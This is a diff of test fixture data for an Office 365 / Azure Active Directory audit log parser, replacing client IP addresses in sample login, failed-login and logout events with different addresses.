@@ -2125,7 +2125,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2143,10 +2143,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:02", "ExtendedProperties": [ { 
@@ -2197,7 +2197,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2207,10 +2207,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:19", "ExtendedProperties": [ { 
@@ -2253,7 +2253,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2271,10 +2271,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:40", "ExtendedProperties": [ { 
@@ -2324,7 +2324,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2334,10 +2334,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:30:58", "ExtendedProperties": [ { 
@@ -2380,7 +2380,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2398,10 +2398,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:31:33", "ExtendedProperties": [ { 
@@ -2452,7 +2452,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2462,10 +2462,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:14:25", "ExtendedProperties": [ { 
@@ -2508,7 +2508,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2526,10 +2526,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:14:51", "ExtendedProperties": [ { 
